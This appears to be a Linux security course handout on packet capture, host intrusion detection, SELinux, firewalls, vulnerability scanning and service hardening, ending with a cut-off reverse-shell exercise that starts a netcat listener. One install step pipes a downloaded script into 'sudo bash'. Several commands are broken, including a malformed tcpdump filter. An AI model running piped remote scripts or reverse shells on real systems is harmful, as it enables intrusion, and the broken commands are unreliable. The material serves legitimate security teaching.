

# Linux Security

## Agenda

### 1. Wireshark / tcpdump / nmap

- [Examples tcpdump](#)
- [Example nmap](#)
- [Detect nmap scans on server](#)

### 2. Host Intrusion Detection

- [Installation ossec on Ubuntu](#)
- [AIDE on Ubuntu/Debian](#)

### 3. Logging

- [Remote logging with rsyslog and tls](#)

### 4. Disk Management

- [Install partprobe/parted on Debian](#)

### 5. SELinux / appArmor

- [Install selinux on Debian](#)
- [SELinux including Walkthrough](#)
- [SELinux Troubleshooting on Debian](#)
- [SELinux Troubleshooting on Centos](#)

### 6. Docker / Seccomp

- [Restricting Syscall in Docker](#)

### 7. Firewall

- [nftables](#)
- [firewalld](#)

### 8. Kernel Hardening

- [modules disabled,unprivileged\\_bpf\\_disabled,kexec load disabled](#)
- [Disable TCP timestamps](#)

### 9. Vulnerability Scans

- [OpenVAS Installation on Ubuntu](#)
- [OpenVAS Background](#)
- [Nikto - commandline](#)

### 10. Securing Network Services

- [Securing Tomcat \(Standalone\)](#)
- [SSH](#)
- [ssh-ca](#)

### 11. Virtualization

- [Security Docker](#)

### 12. Hacking

- [Install Metasploitable 2](#)
- [ReverseShell](#)

- [Hacking I - ShellShock \(unprivileged permissions\)](#)
- [Hacking II - privilege escalation](#)

### 13. Documentation

- [Telekom Compliance Guideline](#)
- [Linux Security](#)

## Change language on Ubuntu

```
dpkg-reconfigure locales
# see locales that are current configured
locale
# place where it is configured
/etc/default/locale

# After that relogin or do
# su student
locale
```

## tcpdump

- <https://danielmiessler.com/study/tcpdump/>

## Patching of packages (e.g.)

- Ubuntu will patch packages when CVE's occur
- <https://ubuntu.com/security/CVE-2020-11984>

## Search - Engine IoT

- <https://www.shodan.io/>

## Secure grub with password (not at boot but for changes and subentries)

```
# Create password
# e.g. password
grub-mkpasswd-pbkdf2

# /etc/grub.d/01_password
#!/bin/sh
set -e

cat << EOF
set superusers='grub'
password_pbkdf2 grub grub.pbkpdf2.sha512.....
EOF

##
chmod a+x /etc/grub.d/01_password

## Datei 10_linux
## Variable CLASS
## at then
##
```

```
CLASS="--class gnu-linux ..... --unrestricted"
```

```
update-grub
```

## rsyslog

### Basics

```
# Hyphen before filename : -/.....
# is for syncing but enabled by default since
https://serverfault.com/questions/463170/what-does-filepath-action-mean-in-rsyslog-configuration
## it is set on by default anyways
# You may prefix each entry with the minus "-" sign to omit syncing the file after every logging.
```

### Bug on ubuntu kern.\* logs to user.\*

```
logger -p kern.debug "Testmessage"
# that one logs to user.*
```

### Walkthrough remote logging ubuntu

```
/etc/rsyslog.conf.d/99_remote.conf
```

```
# Provides UDP syslog reception
$ModLoad imudp
$UDPServerRun 514
# Provides TCP syslog reception
$ModLoad imtcp
$InputTCPServerRun 514
```

3. Then restart rsyslog:

```
# systemctl restart rsyslog
```

4. and generate a test message:

```
$ logger -p local0.info 'test logging'
```

Confirm the test message was written to the log:

```
# tail -n 100 /var/log/messages
```

```
# On secondary.example.com
```

```
#/etc/rsyslog.d/99-forward.conf
```

```
# Provides UDP forwarding
```

```
*.* @192.168.1.10
```

```
# Provides TCP forwarding
```

```
*.* @@192.168.1.10
```

```
# systemctl restart rsyslog
```

#Test by using the logger utility on the client, secondary.example.com, and view the message on the server, main. example.com.

#The configuration from this exercise will be used in the next exercise. Please keep the changes.

## systemd-journald -> remote logging

```
# Step 1
on both machines:
main and secondary
apt install systemd-journal-remote

# Step 1a
cp -a /lib/systemd/system/systemd-journal-remote.service /etc/systemd/systemd-journal-remote
# Change line with ExecStart -> param https to http

# Step 2
# on secondary
/etc/systemd/journal-upload.cnf
[Upload]
URL=http://192.168.56.103:19532

# Step 2a
# Start service
systemctl start systemd-journal-upload
systemctl status systemd-journal-upload

# Testing
# on main
journalctl -f -D /var/log/journal/remote
# on secondary
logger 'test logging'
```

## setroubleshoot -> alert

```
# install setroubleshoot
yum install troubleshoot
sealert -a /var/log/audit/audit.log
```

## Create a module and load it

```
ausearch -c 'httpd' --raw | audit2allow -M my-httpd
semodule -X 300 -i my-httpd.pp
```

## Wireshark / tcpdump / nmap

### Examples tcpdump

#### What interfaces are available for listening ?

```
tcpdump -D
## Eventually doublecheck with
ip a
```

#### -n / -nn (Disable hostname / port resolving)

```
## I would always recommend to do so, because it saves performance

## Do not do hostname lookups
tcpdump -i ens3 -n

## Do not do hostname and port lookups
tcpdump -i ens3 -nn
```

#### Exclude specific ports

```
tcpdump ! -p stp -i eth0
## more user friendly
tcpdump -i eth0 not stp and not icmp
```

#### Include ascii output

```
## s0 show unlimited content
## -A ASCII
tcpdump -A -s0 port 80
```

#### Only from and/or to a specific host

```
## to or from host
tcpdump -i eth0 host 10.10.1.1

## To a specific host
tcpdump -i eth0 dst 10.10.1.20
```

#### Write to a pcap file

#### Only show GET requests

```
## this show only all tcp packages
tcpdump -i eth0 tcp

## now let us filter specific ones -> 0x474554 -> is equivalent for GET as hex - numbers
## https://www.torsten-horn.de/techdocs/ascii.htm
## tcp header has 20 bytes and maximum of 60 bytes, allowing for up to 40 bytes of options
```

in the header.

```
tcpdump -s 0 -A -vv 'tcp[((tcp[12:1]((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420'
```

## Same goes for post - operations

```
tcpdump -s 0 -A -vv 'tcp[((tcp[12:1]((tcp[12:1] & 0xf0) >> 2):4] = 0x504f5354'
```

## Deeply explained here

<https://security.stackexchange.com/questions/121011/wireshark-tcp-filter-tcptcp121-0xf0-24>

## Extra http get/post urls

## show linewise

```
tcpdump -s 0 -v -n -l | egrep -i "POST /|GET /|Host:"
```

## Refs:

- <https://hackertarget.com/tcpdump-examples/>

## Example nmap

### Example 1

```
Server 1:  
nmap -p 80 --script=http-enum.nse targetip  
  
Server 2:  
tcpdump -nn port 80 | grep "GET /"
```

### Ref:

- <http://schulung.t3isp.de/documents/linux-security.pdf>

## Detect nmap scans on server

- <https://nmap.org/book/nmap-defenses-detection.html>

## Host Intrusion Detection

### Installation ossec on Ubuntu

#### Wazuh

```
## Fork / Weiterentwicklung
https://wazuh.com/
```

### OSSEC -> Installation

```
### Install on 2 servers
### server 1: ossec-hids-server
### server 2: ossec-hids-agent

## https://www.ossec.net/downloads/#apt-automated-installation-on-ubuntu-and-debian
## Installs repo-config but not correctly !
wget -q -O - https://updates.atomicorp.com/installers/atomic | sudo bash

## add [arch=amd64] to line
root@server1:/etc/apt/sources.list.d# cat atomic.list
deb [arch=amd64] https://updates.atomicorp.com/channels/atomic/ubuntu focal main
```

```
## Install ossec-hids-server
apt install ossec-hids-server

## adjust /var/ossec/etc/ossec.conf
<ossec_config>
  <global>
    <email_notification>yes</email_notification>
    <email_to>root@localhost</email_to>
    <smtp_server>127.0.0.1</smtp_server>
    <email_from>ossec@localhost</email_from>
  </global>
```

```
## Start
/var/ossec/bin/ossec-control start
```

### Testing on server 1

```
ssh root@localhost
## enter wrong password 3 times

## alert is logged to
cd /var/ossec/logs/alerts/
tail alerts.log
2020 Nov 11 13:48:59 server2->/var/log/auth.log
Rule: 5710 (level 5) -> 'Attempt to login using a non-existent user'
Src IP: 127.0.0.1
Nov 11 13:48:59 server2 sshd[56463]: Failed password for invalid user root from 127.0.0.1
```



```
port 44032 ssh2
```

```
** Alert 1605098949.1127: - syslog,sshd,invalid_login,authentication_failed,
2020 Nov 11 13:49:09 server2->/var/log/auth.log
Rule: 5710 (level 5) -> 'Attempt to login using a non-existent user'
Nov 11 13:49:07 server2 sshd[56463]: message repeated 2 times: [ Failed password for
invalid user root from 127.0.0.1 port 44032 ssh2]
```

## Installation server 2 (agent)

```
apt install ossec-hids-agent

## vi /var/ossec/etc/ossec.conf
## change to ip of server 2
<!-- OSSEC example config -->

<ossec_config>
  <client>
    <server-ip>10.10.11.142</server-ip>
  </client>
```

## Manage Agent (server 2) on server1 (ossec-server)

```
/var/ossec/bin/manage_agents

*****
* OSSEC HIDS v3.6.0 Agent manager.      *
* The following options are available: *
*****

(A)dd an agent (A).
(E)xtract key for an agent (E).
(L)ist already added agents (L).
(R)emove an agent (R).
(Q)uit.
Choose your action: A,E,L,R or Q: A

- Adding a new agent (use '\q' to return to the main menu).
Please provide the following:
  * A name for the new agent: server1
  * The IP Address of the new agent: 10.10.11.141
  * An ID for the new agent[001]:
Agent information:
  ID:001
  Name:server2
  IP Address:10.10.11.141

Confirm adding it?(y/n): y
Agent added with ID 001.

*****
* OSSEC HIDS v3.6.0 Agent manager.      *
* The following options are available: *
```

```

*****

(A)dd an agent (A).
(E)xtract key for an agent (E).
(L)ist already added agents (L).
(R)emove an agent (R).
(Q)uit.
Choose your action: A,E,L,R or Q: e

Available agents:
  ID: 001, Name: server2, IP: 10.10.11.141
Provide the ID of the agent to extract the key (or '\q' to quit): 1

Agent key information for '001' is:
MDAxIHN1cnZlcjEgMTAuMTAuMTEuMTQxIDkyMjAyMGQ5NzNjODE4NDM3YmIxZmU5ZDBjMmFmYmMwY2JmMmE2Y2EzNj11

** Press ENTER to return to the main menu.

*****
* OSSEC HIDS v3.6.0 Agent manager.      *
* The following options are available: *
*****

(A)dd an agent (A).
(E)xtract key for an agent (E).
(L)ist already added agents (L).
(R)emove an agent (R).
(Q)uit.
Choose your action: A,E,L,R or Q: q

** You must restart OSSEC for your changes to take effect.

manage_agents: Exiting.
manage_agents: Exiting.
root@server2:/var/ossec/logs/alerts#

## Server neu starten
/var/ossec/bin/ossec-control restart

```

## Import Key on agent - system (server 2)

```

/var/ossec/bin/manage_agents

*****
* OSSEC HIDS v3.6.0 Agent manager.      *
* The following options are available: *
*****

(I)mport key from the server (I).
(Q)uit.
Choose your action: I or Q: I

* Provide the Key generated by the server.

```

```

* The best approach is to cut and paste it.
*** OBS: Do not include spaces or new lines.

Paste it here (or '\q' to quit):
MDAxIHNlcnZlcjEgMTAuMTAuMTEuMTQxIDkyMjAyMGQ5NzNjODE4NDM3YmIxZmU5ZDBjMmFmYmMwY2JmMmE2Y2EzNj11

Agent information:
  ID:001
  Name:server2
  IP Address:10.10.11.141

Confirm adding it?(y/n): y
2020/11/11 14:08:11 manage_agents: ERROR: Cannot unlink /queue/rids/sender: No such file
or directory
Added.
** Press ENTER to return to the main menu.

*****
* OSSEC HIDS v3.6.0 Agent manager.      *
* The following options are available: *
*****
  (I)mport key from the server (I).
  (Q)uit.
Choose your action: I or Q: q

** You must restart OSSEC for your changes to take effect.

manage_agents: Exiting.
manage_agents: Exiting.
root@server1:/var/ossec/etc#

#### Restart agent
/var/ossec/bin/ossec-control restart

```

### produce problem on server 2 (agent)

```

## enter wrong password 3 times
ssh root@localhost

```

### validatte on server 1 (server)

```

you should get an email to root
please check
/var/ossec/logs/alert/alert.log

## if this is not working restart server2 and agent->server1
server1: /var/ossec/bin/ossec-control restart
server2: /var/ossec/bin/ossec-control restart

## Please retry to ssh with wrong pw 3 x !!!

```

### Change scan config on server1 ossec.conf

```
## like so --> first lines
<syscheck>
  <!-- Frequency that syscheck is executed -- default every 20 hours -->
  <frequency>120</frequency>
  <alert_new_files>yes</alert_new_files>

  <!-- Directories to check (perform all possible verifications) -->
  <directories check_all="yes" report_changes="yes"
realtime="yes">/etc,/usr/bin,/usr/sbin</directories>
  <directories check_all="yes" report_changes="yes"
realtime="yes">/bin,/sbin,/boot</directories>
```

```
## Adjust local rules
root@server1:/var/ossec/rules# vi local_rules.xml
<rule id="554" level="7" overwrite="yes">
  <category>ossec</category>
  <decoded_as>syscheck_new_entry</decoded_as>
  <description>File added to system</description>
  <group>syscheck,</group>
</rule>

</group> <!-- SYSLOG,LOCAL -->
```

### Restart hids-server (server1)

```
/var/ossec/bin/ossec-control restart
```

### Optional scan immediately

```
##it is possible from the hids-server (server1 aka main.example)
##to do an immediate scan on the agents (server2 aka secondary.example.com)
## by restarting agent

/var/ossec/bin/agent_control -R 001
```

## AIDE on Ubuntu/Debian

### Install

```
apt install aide
## adjust config
## /etc/aide.conf /etc/aide.conf.d <- rules
aideinit

## No necessary on Debian / Ubuntu
## aideinit does this
## mv /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz
```

### Backup

```
tar czvf initial-aide.tgz /etc/aide/aide.conf /usr/bin/aide /var/lib/aide/aide.db.new
```

### Simulate modification

```
echo "11.11.11.11 bad.host.com bad" >> /etc/hosts
```

### Do the check

```
## In Ubuntu like so
aide.wrapper --check

## In Debian like so
aide --check --config=/etc/aide/aide.conf
```

### Check is done on a daily basis

- /etc/cron.daily/aide

## Logging

### Remote logging with rsyslog and tls

#### Works

- with rsyslog 6+
- Tested with Debian 11 (bullseye)

#### Create certificates and put in both server and client

```
## in /etc/pki/tls/certs/  
## lab.crt, lab.key  
  
### Main - Server - config
```

#### Configuration on Server

```
apt install rsyslog-gnutls
```

```
##/etc/rsyslog.d/main-tls.conf  
### Added for TLS support  
## make gtls driver the default  
## $DefaultNetstreamDriver gtls  
  
## certificate files  
$DefaultNetstreamDriverCAFile /etc/pki/tls/certs/lab.crt  
$DefaultNetstreamDriverCertFile /etc/pki/tls/certs/lab.crt  
$DefaultNetstreamDriverKeyFile /etc/pki/tls/certs/lab.key  
  
## provides TCP syslog reception with encryption  
module(load="imtcp" StreamDriver.Name="gtls" StreamDriver.Mode="1"  
StreamDriver.AuthMode="anon")  
input(type="imtcp" port="6514" )
```

```
systemctl restart rsyslog
```

#### Configuration on Client

```
apt install rsyslog-gnutls
```

```
##/etc/rsyslog.d/secondary-tls.conf  
## This is the client side of the TLS encrypted rsyslog  
  
## certificate file, just the CA file for a client  
$DefaultNetstreamDriverCAFile /etc/pki/tls/certs/lab.crt  
  
## set up action  
$DefaultNetstreamDriver gtls           #use the gnutls netstream driver  
$ActionSendStreamDriverMode 1          #require the use of tls  
$ActionSendStreamDriverAuthMode anon   #the server is NOT authenticated  
## send all messages  
*. * @@(o)main.example.com:6514
```

---

```
systemctl restart rsyslog
```

## Testing

```
## on secondary
logger "Does this work"

## check secondary
/var/log/messages

## check main
/var/log/messages

## <- should be in both log files
```

## Disk Managemenet

### Install partprobe/parted on Debian

```
## partprobe is in the package parted  
apt install parted
```



## SELinux / appArmor

### Install selinux on Debian

#### Walkthrough

```
apt-get install selinux-basics selinux-policy-default auditd
selinux-activate
reboot

## for checking
## Also refer to our other documents
## e.g. apache walkthrough
setenforce 1

check-selinux-installation
echo $?
```

#### Howto on Debian

- <https://wiki.debian.org/SELinux/Setup>

## SELinux including Walkthrough

### context ändern und wiederherstellen

```
cd /var/www/html
echo "hallo welt" > welt.html
chcon -t var_t welt.html
## when enforcing fehler beim aufruf im Browser

## herstellen auf basis der policies
restorecon -vr /var/www/html
```

### Walkthrough

```
## be sure selinux is activated
setenforce 1
ps -efZ | grep apache2
system_u:system_r:httpd_t:s0 root 9967 1 0 04:18 ?
00:00:00 /usr/sbin/apache2 -k start
touch /var/www/html/index.html
ls -Z /var/www/html/*
## output
unconfined_u:object_r:httpd_sys_content_t:s0 /var/www/html/index.html
## So is http_t - domain allowed to access ?
sesearch --allow --source httpd_t --target httpd_sys_content_t --class
file
## Yes !
2019/07/31 08:25 47/56
Training materials / Schulungsunterlagen - http://localhost/dokuwiki/
## output
allow httpd_t httpd_sys_content_t:file { lock ioctl read getattr open
};
allow httpd_t httpdcontent:file { create link open append rename write
ioctl lock getattr unlink setattr read }; [ ( httpd_builtin_scripting
&& httpd_unified && httpd_enable_cgi ) ]:True
...
## so let's check
echo "<html><body>hello</body></html>" > /var/www/html/index.html
chmod 775 /var/www/html/index.html
## open in browser:
## e.g.
## http://<yourip>
## you should get an output -> hello ;o)
## Now change the type of the file
## ONLY changes temporarily
## NEXT restorecon breaks it.
chcon --type var_t /var/www/html/index.html
ls -Z /var/www/html/index.html
## open in browser again
## http://<yourip>
## NOW -> you should have a permission denied
## Why ? -> var_t is not one of the context the webserver domain
(http_t) is not authorized to connect to
## Doublecheck
```

```

sesearch --allow --source httpd_t --target var_t --class file
## -> no output here -> no access
## Restore again
restorecon -v /var/www/html/index.html
## output
## Relabeled /var/www/html/index.html from
unconfined_u:object_r:var_t:s0 to
unconfined_u:object_r:httpd_sys_content_t:s0
ls -Z /var/www/html/index.html
## output
unconfined_u:object_r:httpd_sys_content_t:s0 /var/www/html/index.html
## open in browser again
## http://<yourip>
## Now testpage works again

```

## setroubleshoot to find problems

```

yum install setroubleshoot
sealert -a /var/log/audit/audit.log
## see how to fix

```

## Create module

```

setenforce 0
## replay situation, like opening page in webbrowser -> httpd
## analyse logs
ausearch -c 'httpd' --raw | audit2allow -M my-httpd
semodule -i my-httpd.pp
setenforce 1
## retest- should work now

```

## Set single domains/types to permissive

```

semanage permissive -a httpd_t
semodule -l | grep permissive
permissive_httpd_t 1.0
permissivedomains 1.0.0
semanage permissive -d httpd_t

```

## Docs

- <http://schulung.t3isp.de/documents/linux-security.pdf>

## SELinux Troubleshooting on Debian

```
## Situation: Permission denied with ssh after setting enforcing mode

## How to deal ?
cd /var/log/audit

## get some hints, e.g. use audit2why
cat audit.log | audit2why

## Created a module we can install, if we want
cat audit.log | grep 'comm="sshd"' | audit2allow -M sshaccess

## Look what the module does in same
cat sshallow.te

## Got an hint we can active bool -> ssh_sysadm_login
setsebool -P ssh_sysadm_login 0

## finally check if you can login by ssh
```

## SELinux Troubleshooting on Centos

```
## Find out which problems you had
cd /var/log/audit
sealert -a audit.log > report.log

## Alternative - look into messages and find uid
vi messages
sealert -l de929621-a863-4f2f-ac74-4453138c8c08

## With both you answers how to proceed
## in case of a port missing
## e.g.
## which port type belongs to 80
semanage port -l | grep 80
## add you port to that list
semanage port -a -t http_port_t -p tcp 85
```

# Docker / Seccomp

## Restricting Syscall in Docker

### Walkthrough

```
## Step 1: Download default.json
## From:
## https://raw.githubusercontent.com/docker/labs/master/security/seccomp/seccomp-
profiles/default.json

## Step 2: remove chmod from syscall in json + rename file to no-chmod.json

## Step 3:
docker run --rm -it --security-opt seccomp=no-chmod.json alpine sh
/ # chmod 777 /etc/services
chmod: /etc/services: Operation not permitted
```

### References

- <https://docs.docker.com/engine/security/seccomp/>
- <https://martinheinz.dev/blog/41>

# Firewall

## nftables

### Generally ;o)

```
## In IPtables, -> several chains and tables that are loaded by default.  
iptables -L
```

In nftables, there are no default chains or tables.

### Ubuntu 20.04LTS -> 20.10

Starting from Ubuntu 20.10 it will be the default system -> nftables

### nftables in Debian

nftables are use by default in Debian 10,11  
(by using iptables -> which are translate to nft)

### Walkthrough / migration to nftables

#### take care of current rules

```
iptables-save > fwrules.txt  
cat fwrules.txt  
iptables-restore-translate -f fwrules.txt  
iptables-restore-translate -f fwrules.txt > ruleset.nft
```

### now installing nftables

```
apt install nftables  
## important -> iptables will still work then  
## apt install iptables-nftables-compat # not needed for ubuntu 20.04  
systemctl enable --now nftables.service
```

### now load the rules to nft

```
nft -f ruleset.nft  
nft list ruleset
```

### Examples nft

```
##review current configuration:  
root@host [~]# nft list ruleset  
  
##Add a new table, with family "inet" and table "filter":  
root@host [~]# nft add table inet filter  
  
##Add a new chain, to accept all inbound traffic:
```

```

root@host [~]# nft add chain inet filter input \{ type filter hook input priority 10 \;
policy drop \; \}

##Add a new rule, to accept several TCP ports:
root@host [~]# nft add rule inet filter input tcp dport \{ ssh, telnet, https, http \}
accept

##To show rule handles:
root@host [~]# nft --handle --numeric list chain family table chain
## show handles and numbers
nft --handle --numeric list ruleset

##To delete a rule:
root@host [~]# nft delete rule inet filter input handle 3

##To save the current configuration:
root@host [~]# nft list ruleset > /etc/nftables.conf

```

## Deleting rules / all rules

```

## handle is an internal number that identifies a certain rule.

nft flush rule filter output
nft flush table filter

```

## Create a firewall config

```

flush ruleset

## List all IPs and IP ranges of your traffic filtering proxy source.
define SAFE_TRAFFIC_IPS = {
    x.x.x.x/xx,
    x.x.x.x/xx,
    x.x.x.x,
    x.x.x.x
}

table inet firewall {

    chain inbound {

        # By default, drop all traffic unless it meets a filter
        # criteria specified by the rules that follow below.
        type filter hook input priority 0; policy drop;

        # Allow traffic from established and related packets.
        ct state established,related accept

        # Drop invalid packets.
        ct state invalid drop

        # Allow loopback traffic.
        iifname lo accept
    }
}

```



```

# Allow all ICMP and IGMP traffic, but enforce a rate limit
# to help prevent some types of flood attacks.
ip protocol icmp limit rate 4/second accept
ip6 nexthdr ipv6-icmp limit rate 4/second accept
ip protocol igmp limit rate 4/second accept

# Allow SSH on port 22.
tcp dport 22 accept

# Allow HTTP(S).
# -- From anywhere
tcp dport { http, https } accept
udp dport { http, https } accept
# -- From approved IP ranges only
# tcp dport { http, https } ip saddr $SAFE_TRAFFIC_IPS accept
# udp dport { http, https } ip saddr $SAFE_TRAFFIC_IPS accept

# Uncomment to allow incoming traffic on other ports.
# -- Allow Jekyll dev traffic on port 4000.
# tcp dport 4000 accept
# -- Allow Hugo dev traffic on port 1313.
# tcp dport 1313 accept

# Uncomment to enable logging of denied inbound traffic
# log prefix "[nftables] Inbound Denied: " flags all counter drop
}

chain forward {

    # Drop everything (assumes this device is not a router)
    type filter hook forward priority 0; policy drop;

    # Uncomment to enable logging of denied forwards
    # log prefix "[nftables] Forward Denied: " flags all counter drop

}

chain outbound {

    # Allow all outbound traffic
    type filter hook output priority 0; policy accept;

}

}

```

**Ref:**

- [https://wiki.nftables.org/wiki-nftables/index.php/Simple\\_ruleset\\_for\\_a\\_server](https://wiki.nftables.org/wiki-nftables/index.php/Simple_ruleset_for_a_server)
- <https://firewalld.org/documentation/man-pages/firewalld.conf.html>

**Some commands ;o**

```
## add chain
## lower priority first
nft add chain inet example_table example_chain { type filter hook input priority 10 \;
policy drop \; }

### append at the end
nft add rule inet my_table my_filter_chain tcp dport ssh accept

### add at the beginning
nft insert rule inet my_table my_filter_chain tcp dport http accept
```

## revert back to iptables

```
'firewallbackend' entry in /etc/firewalld/firewalld.conf back to 'iptables',
```

## References

- <https://www.liquidweb.com/kb/how-to-install-nftables-in-ubuntu/>
- [https://wiki.nftables.org/wiki-nftables/index.php/Configuring\\_chains#Base\\_chain\\_priority](https://wiki.nftables.org/wiki-nftables/index.php/Configuring_chains#Base_chain_priority)

## firewalld

### Install firewalld

### Is firewalld running ?

```
## is it set to enabled ?
systemctl status firewalld
firewall-cmd --state
```

### Command to control firewalld

- firewall-cmd

### Best way to add a new rule

```
## Step1: do it persistent -> written to disk
firewall-cmd --add-port=82/tcp --persistent

## Step 2: + reload firewall
firewall-cmd --reload
```

### Zones documentation

man firewalld.zones

### Zones available

```
firewall-cmd --get-zones
block dmz drop external home internal public trusted work
```

### Active Zones

```
firewall-cmd --get-active-zones
## in our case empty
```

### Show information about all zones that are used

```
firewall-cmd --list-all
firewall-cmd --list-all-zones
```

### Add Interface to Zone ~ Active Zone

```
firewall-cmd --zone=public --add-interface=enp0s3 --permanent
firewall-cmd --reload
firewall-cmd --get-active-zones
public
    interfaces: enp0s3
```

### Default Zone

```
## if not specifically mentioned when using firewall-cmd
## .. add things to this zone
```

```
firewall-cmd --get-default-zone
public
```

### Show services / show service details (Which ports?)

```
firewall-cmd --get-services
firewall-cmd --info-service=http
```

### Adding/Removing a service

```
firewall-cmd --permanent --zone=public --add-service=ssh
firewall-cmd --reload
firewall-cmd --permanent --zone=public --remove-service=ssh
firewall-cmd --reload
```

### Add/Remove ports

```
firewall-cmd --add-port=82/tcp --zone=public --permanent
```

### Enable / Disabled icm

```
firewall-cmd --get-icmptypes
## none present yet
firewall-cmd --zone=public --add-icmp-block-inversion --permanent
firewall-cmd --reload
```

### Working with rich rules

```
## Documentation
## man firewallld.richlanguage

## throttle connections
firewall-cmd --permanent --zone=public --add-rich-rule='rule family=ipv4 source
address=10.0.50.10/32 service name=http log level=notice prefix="firewalld rich rule INFO:
" limit value="100/h" accept'
firewall-cmd --reload #
firewall-cmd --zone=public --list-all

## port forwarding
firewall-cmd --get-active-zones
firewall-cmd --zone=public --list-all
firewall-cmd --permanent --zone=public --add-rich-rule='rule family=ipv4 source
address=10.0.50.10 forward-port port=42343 protocol=tcp to-port=22'
firewall-cmd --reload
firewall-cmd --zone=public --list-all
firewall-cmd --remove-service=ssh --zone=public

##

## list only the rich rules
firewall-cmd --zone=public --list-rich-rules
```

```
## persist all runtime rules
firewall-cmd --runtime-to-permanent
```

## Install firewalld and restrict ufw (Ubuntu)

```
apt install firewalld
systemctl status firewalld
systemctl status ufw

## ufw service is still running, but :
ufw status
-> disabled # this has to be the case

##
systemctl disable --now ufw.service
```

## References

- <https://www.linuxjournal.com/content/understanding-firewalld-multi-zone-configurations#:~:text=Going%20line%20by%20line%20through,or%20source%20associated%20with%20it.>
- <https://www.answertopia.com/ubuntu/basic-ubuntu-firewall-configuration-with-firewalld/>

## Kernel Hardening

**modules\_disabled,unprivileged\_bpf\_disabled,kexec\_load\_disabled**

### Hardening params

```
## Prevent loading of modules after a specific timeframe after boot
kernel.modules_disabled=1

## Disable live patching
kernel.kexec_load_disabled=1

## You are not using berkeley package filter
## disable loading of modules
kernel.unprivileged_bpf_disabled=1
```

## Tools

### Lockdown

Interesting script to do some restrictions

<https://gitlab.com/taggart/lockdown>

## Disable TCP timestamps

### Why ?

When timestamps are enabled, attacker can find out how long the system is already running.

By so, he can evtl findout the patch - level of the system.

### Test (Centos)

```
## Enabled
main (Server):
yum install httpd
systemctl start httpd
sysctl net.ipv4.tcp_timestamps
net.ipv4.tcp_timestamps = 1

secondary (Server):
yum install epel-release
yum install hping3
hping3 -S -p 80 --tcp-timestamp

## now switch it off
main (server):
sysctl net.ipv4.tcp_timestamps = 0

secondary (server):
hping3 -S -p 80 --tcp-timestamp
```

### Ref:

<https://netsense.ch/blog/tcp-timestamps/>

## Vulnerability Scans

### OpenVAS Installation on Ubuntu

#### Working with Vagrant

```
### 1. Install:
virtualbox
vagrant
git for windows
### 2. Create the box
## click context-menu -> git bash here
mkdir ubuntu
cd ubuntu
vagrant init ubuntu/focal
vagrant up
vagrant ssh # log into the box
```

#### Installation for version GVM 20.08 (2021-05-19)

```
Variant 1:
Install on Ubuntu Server 20.04:
as follows:
https://launchpad.net/~mrazavi/+archive/ubuntu/gvm

or
Variant 2:
docker-container (not tested from my side)
https://github.com/admirito/gvm-containers
```

#### Installation for version GVM 11

### OpenVAS (Ubuntu 20.04LTS)

#### Requirements

- tested with 1 GB and 25 GB -> does not work, df -> 100% // GMP error during authentication -> when trying to login
- tested with 2 GB and 50 GB -> WORKS !

#### openvas -> gvm (Greenbone Vulnerability Management) / mrazavi

```
Installation on Ubuntu 20.04 LTS
https://launchpad.net/~mrazavi/+archive/ubuntu/gvm
## https://www.osboxes.org/ubuntu/
## Done with vagrant init ubuntu/focal64 instead

## postgresql is needed
sudo apt install -y postgresql
sudo add-apt-repository ppa:mrazavi/gvm
sudo apt install -y gvm
## only from one machine (when same source ip) at a time
greenbone-nvt-sync
sudo greenbone-scaphdata-sync
```



```
sudo greenbone-certdata-sync
```

You can access the Greenbone Security Assistant web interface at:

```
https://localhost:9392
```

The default username/password is as follows:

```
Username: admin
```

```
Password: admin
```

You can check the status of greenbone daemons with systemctl:

```
systemctl status ospd-openvas # scanner
```

```
systemctl status gvmd # manager
```

```
systemctl status gsad # web ui
```

```
## change /etc/default
```

```
https://<ip>:9392
```

Documentation <https://docs.greenbone.net/GSM-Manual/gos-20.08/en/web-interface.html>

## PDF - Generation

```
## 2 packages are needed for the pdf-generation:
```

```
apt install -y texlive-latex-extra --no-install-recommends
```

```
apt install -y texlive-fonts-recommended
```

```
## after having installed these, pdf generation works !
```

## OpenVAS Background

- <https://www.greenbone.net/en/product-comparison/>

## Nikto - commandline

## Walkthrough

```
## Debian 10
apt install nikto
nikto -h http://main
```

## Securing Network Services

### Securing Tomcat (Standalone)

#### Run Behind nginx / apache

#### Change Server-Header

```
/conf/server.xml
<Connector port="8080" protocol="HTTP/1.1"
connectionTimeout="20000"
Server = " "
redirectPort="8443" />
```

#### Enable ssl

```
## In server.xml under Connector
SSLEnabled="true" scheme="https" keystoreFile="ssl/keystore.jks" keystorePass="somepass"
clientAuth="false" sslProtocol="TLS"
```

#### Force ssl

```
<security-constraint>
<web-resource-collection>
<web-resource-name>Protected Context</web-resource-name>
<url-pattern>/*</url-pattern>
</web-resource-collection>
<user-data-constraint>
<transport-guarantee>CONFIDENTIAL</transport-guarantee>
</user-data-constraint>
</security-constraint>
```

#### Prevent XSS - attacks (Clients side scripts) on cookies

- <https://owasp.org/www-community/HttpOnly>

#### Delete unnecessary apps

```
[root@main webapps]# ls -lt
drwxr-xr-x 14 tomcat tomcat 4096 Sep 29 15:26 docs
drwxr-xr-x 7 tomcat tomcat 4096 Sep 29 15:26 examples
drwxr-xr-x 5 tomcat tomcat 4096 Sep 29 15:26 host-manager
drwxr-xr-x 5 tomcat tomcat 4096 Sep 29 15:26 manager
drwxr-xr-x 3 tomcat tomcat 4096 Sep 29 15:26 ROOT
```

#### Standard-Exception - Seite und Fehlerseiten erden

```
web.xml
404 /error.jsp 403 /error.jsp 500 /error.jsp
java.lang.Exception /error.jsp
```

#### Run with security manager

```
Start tomcat with open "-security"
This imposes the security manager

## debian 10
## Enable SECURITY_MANAGER = true
## in /etc/default/tomcat9

https://tomcat.apache.org/tomcat-9.0-doc/security-manager-howto.html
```

**Ref:**

- <https://geekflare.com/de/apache-tomcat-hardening-and-security-guide/>

## SSH

### Tools

- [https://www.ssh-audit.com/hardening\\_guides.html](https://www.ssh-audit.com/hardening_guides.html)

### Ref:

- Setting correct ciphers a.s.o.
- [https://www.ssh-audit.com/hardening\\_guides.html#ubuntu\\_20\\_04\\_lts](https://www.ssh-audit.com/hardening_guides.html#ubuntu_20_04_lts)

**ssh-ca**

**Refs:**

- <https://www.lorier.net/docs/ssh-ca.html>

## Virtualization

## Hacking

### Install Metasploitable 2

### ReverseShell

### Control-Node main.example.com

```
## here we will issue the commands  
nc -l 4444
```

### Hacked node secondary.example.com

```
